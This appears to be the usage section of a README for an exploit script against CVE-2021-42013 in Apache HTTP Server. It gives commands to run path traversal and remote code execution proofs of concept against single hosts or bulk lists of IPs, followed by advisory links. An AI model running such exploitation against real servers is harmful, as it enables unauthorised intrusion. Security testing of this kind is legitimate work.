Usage cve-2021-42013.py

Check for Path Traversal and Remote Code Execution

$ python3 exploit.py -u http://172.17.0.2

Path Traversal PoC

$ python3 exploit.py -u http://172.17.0.2 -pt

Remote Code Execution PoC

$ python3 exploit.py -u http://172.17.0.2 -rce

For bulk scanning, provide a text file containing IPs:

$ python3 exploit.py -l list.txt

$ python3 exploit.py -l list.txt -pt

$ python3 exploit.py -l list.txt -rce

More information can be found here.

References

• https://nvd.nist.gov/vuln/detail/CVE-2021-42013
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013
• https://www.cve.org/CVERecord?id=CVE-2021-42013
• https://httpd.apache.org/security/vulnerabilities_24.html
• https://pwn0sec.medium.com/apache-http-server-path-traversal-remote-code-execution-rce-kepolisian-negara-republik-68b7571181a6